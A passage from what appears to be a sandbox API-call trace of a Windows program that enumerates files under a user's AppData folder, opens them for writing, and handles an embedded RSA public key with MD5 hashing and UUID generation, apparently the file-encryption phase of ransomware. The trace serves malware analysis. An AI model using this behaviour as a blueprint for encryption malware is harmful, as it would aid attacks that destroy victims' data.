Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0200.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0200.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0200.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.046] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\") returned="Services\\" [0200.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7630 [0200.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8f50 [0200.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.047] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0200.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0200.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7630 | out: hHeap=0x2c0000) returned 1 [0200.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0200.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8f50 | out: hHeap=0x2c0000) returned 1 [0200.047] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0200.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0200.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0200.048] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0200.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05480 [0200.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0200.048] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0200.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0200.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05480 | out: hHeap=0x2c0000) returned 1 [0200.049] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0200.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7630 [0200.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0200.049] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0200.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7630 | out: hHeap=0x2c0000) returned 1 [0200.055] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.055] PathFindFileNameW (pszPath="") returned="" [0200.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.055] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\internet explorer\\services\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x7525ca20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x7525ca20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05e28 [0200.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.061] FindNextFileW (in: hFindFile=0x2a05e28, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x7525ca20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x7525ca20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.061] FindNextFileW (in: hFindFile=0x2a05e28, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7525ca20, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x7525ca20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x7525ca20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x10be, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico", cAlternateFileName="SEARCH~1.ICO")) returned 1 [0200.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0200.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.061] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico") returned=".ico" [0200.062] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\internet explorer\\services\\search_{0633ee93-d776-472f-a0ff-e1416b8b2e3a}.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0200.074] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=4286) returned 1 [0200.074] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0200.076] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x1098, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.076] ReadFile (in: hFile=0x52c, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0200.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0200.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0200.118] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.118] ReadFile (in: hFile=0x52c, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x10be, lpOverlapped=0x0) returned 1 [0200.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a79478 [0200.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.153] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31bca0) returned 1 [0200.155] CryptCreateHash (in: hProv=0x31bca0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0200.155] CryptHashData (hHash=0x2a05d28, pbData=0x2a79478, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0200.155] CryptGetHashParam (in: hHash=0x2a05d28, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0200.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0200.155] CryptGetHashParam (in: hHash=0x2a05d28, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0200.155] GetLastError () returned 0x0 [0200.155] CryptDestroyHash (hHash=0x2a05d28) returned 1 [0200.155] CryptReleaseContext (hProv=0x31bca0, dwFlags=0x0) returned 1 [0200.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a79478 | out: hHeap=0x2c0000) returned 1 [0200.156] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0200.156] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0200.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0200.156] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0200.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0200.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0200.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c0) returned 0x2adc6d0 [0200.156] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0200.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0200.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a79478 [0200.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0200.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0200.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0200.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05480 [0200.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d2b0 [0200.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a057e0 [0200.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d4c0 [0200.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ae8 [0200.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b00 [0200.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b30 [0200.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0200.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0200.157] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0200.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0200.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0200.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b30 | out: hHeap=0x2c0000) returned 1 [0200.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0200.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0200.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0200.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b00 [0200.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7d70 [0200.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b30 [0200.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26668 [0200.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6ae8 [0200.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0200.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x29dcde8 [0200.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7630 [0200.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0200.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0200.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0200.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0200.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0200.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29dcde8 | out: hHeap=0x2c0000) returned 1 [0200.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b30 | out: hHeap=0x2c0000) returned 1 [0200.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0200.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0200.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26668 | out: hHeap=0x2c0000) returned 1 [0200.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7d70 | out: hHeap=0x2c0000) returned 1 [0200.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0200.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7630 | out: hHeap=0x2c0000) returned 1 [0200.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0200.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0200.161] GetCurrentThreadId () returned 0x5d8 [0200.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0200.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2eceb0 [0200.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42628 [0200.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31bca0 [0200.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0200.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7d70 [0200.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0200.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0200.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0200.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0200.162] GetCurrentThreadId () returned 0x5d8 [0200.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0200.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0200.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x29dcde8 [0200.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0200.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0200.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0200.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0200.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29dcde8 | out: hHeap=0x2c0000) returned 1 [0200.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0200.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7d70 | out: hHeap=0x2c0000) returned 1 [0200.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0200.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7d70 [0200.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0200.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0200.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b00 [0200.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0200.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0200.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0200.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0200.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0200.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0200.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0200.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0200.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ae8 [0200.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0200.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0200.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0200.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0200.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0200.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0200.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0200.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b30 [0200.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0200.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26668 [0200.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0200.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b90 [0200.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0200.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b48 [0200.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0200.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0200.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0200.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b18 [0200.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0200.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ba8 [0200.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0200.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b78 [0200.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ba8 | out: hHeap=0x2c0000) returned 1 [0200.165] RtlAllocateHeap (HeapHandle=0x2c0000, 